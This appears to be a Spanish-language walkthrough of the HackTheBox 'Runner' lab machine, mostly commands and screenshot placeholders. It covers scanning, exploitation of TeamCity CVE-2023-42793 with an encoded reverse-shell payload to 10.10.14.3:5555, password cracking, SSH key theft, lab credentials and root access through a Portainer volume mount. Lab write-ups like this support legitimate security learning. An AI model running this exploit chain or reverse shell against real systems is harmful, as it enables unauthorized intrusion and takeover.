Runner

Jul 20, 2024
HTB Linux

nmap -A -p- -oA runner 10.10.11.13 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA runner 10.10.11.13

echo "10.10.11.13 runner.htb teamcity.runner.htb portainer-administration.runner.htb" | sudo tee -a /etc/hosts

![ssh_command.](/20240720125353.png]]

nmap -sU -O -p- -oA runner-udp 10.10.11.13

ping -c 1 10.10.11.13

![ssh_command.](/20240720124946.png]]

nmap -p- --open -T5 -v -n 10.10.11.13

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.13 -oG allPorts

![ssh_command.](/20240720125448.png]]

extractPorts allPorts

nmap -sCV -p22,80,8080 10.10.11.13 -oN targeted

![ssh_command.](/20240720125600.png]]

bc targeted -l rb

![ssh_command.](/20240720125646.png]]

whatweb http://10.10.11.13

![ssh_command.](/20240720125800.png]]

wfuzz -c --hc=404,400,302 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.11.13:8000/FUZZ

![ssh_command.](/20240720131326.png]]

cewl http://runner.htb -d 2 -w wordlist.txt

wfuzz -c --hc=302,404,403,400 -t 200 -w wordlist.txt -u http://10.10.11.13/ -H "Host: FUZZ.runner.htb"

![ssh_command.](/20240720132129.png]]

Vamos a http://teamcity.runner.htb

![ssh_command.](/20240720132542.png]]

searchsploit teamcity

![ssh_command.](/20240720132757.png]]

Clonamos lo siguiente

git clone https://github.com/Zyad-Elsayed/CVE-2023-42793

pip3 install -r requirements.txt

![ssh_command.](/20240720133849.png]] Me logueo con las credenciales

![ssh_command.](/20240720134307.png]]

python3 rce.py -u http://teamcity.runner.htb -t token -c ’“/bin/bash”&params=“-c”&params=“sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{10.10.14.3}%2F{5555}%200%3E%261”’

nc -lvnp 5555

https://exploit-notes.hdks.org/exploit/web/teamcity-pentesting/

![ssh_command.](/20240720135402.png]]

Nos vamos a backup

![ssh_command.](/20240720135509.png]]

Bajamos el zip

![ssh_command.](/20240720135609.png]]

Le hacemos un

unzip TeamCity_Backup_20240720_1955119.zip

bc users

![ssh_command.](/20240720135931.png]]

batcat hash

![ssh_command.](/20240720145648.png]]

![ssh_command.](/20240720141132.png]]

john --wordlist=/usr/share/wordlists/rockyou.txt hash

![ssh_command.](/20240720143820.png]]

tree -f | grep -i 'id_rsa'

cp config/projects/AllProjects/pluginData/ssh_keys/id_rsa .

![ssh_command.](/20240720143616.png]]

chmod 600 id_rsa

ssh -i id_rsa john@runner.htb

![ssh_command.](/20240720144319.png]]

find / -type f -perm -u=s 2>/dev/null

![ssh_command.](/20240720145349.png]]

cd /etc/nginx/sites-enabled

cat portainer

![ssh_command.](/20240720150008.png]]

![ssh_command.](/20240720150027.png]]

Vamos a http://portainer-administration.runner.htb

Y entramos con el usuario matthew:piper123

![ssh_command.](/20240720150612.png]]

Nos dirigimos a Volumes y creamos un nuevo Volume

![ssh_command.](/20240720151131.png]]

Creamos el siguiente Volume

![ssh_command.](/20240720151410.png]]

Creamos un container

![ssh_command.](/20240720151517.png]]

![ssh_command.](/20240720151643.png]]

![ssh_command.](/20240720151711.png]]

![ssh_command.](/20240720151836.png]]

![ssh_command.](/20240720151940.png]]

En imagenes hacemos lo siguiente:

![ssh_command.](/20240720152216.png]]

Le damos click para crear el contenedor nuevo

Nos metemos a la consola

![ssh_command.](/20240721180032.png]]

![ssh_command.](/20240721180114.png]]

cd /mnt

cat root/root.txt

![ssh_command.](/20240721180355.png]]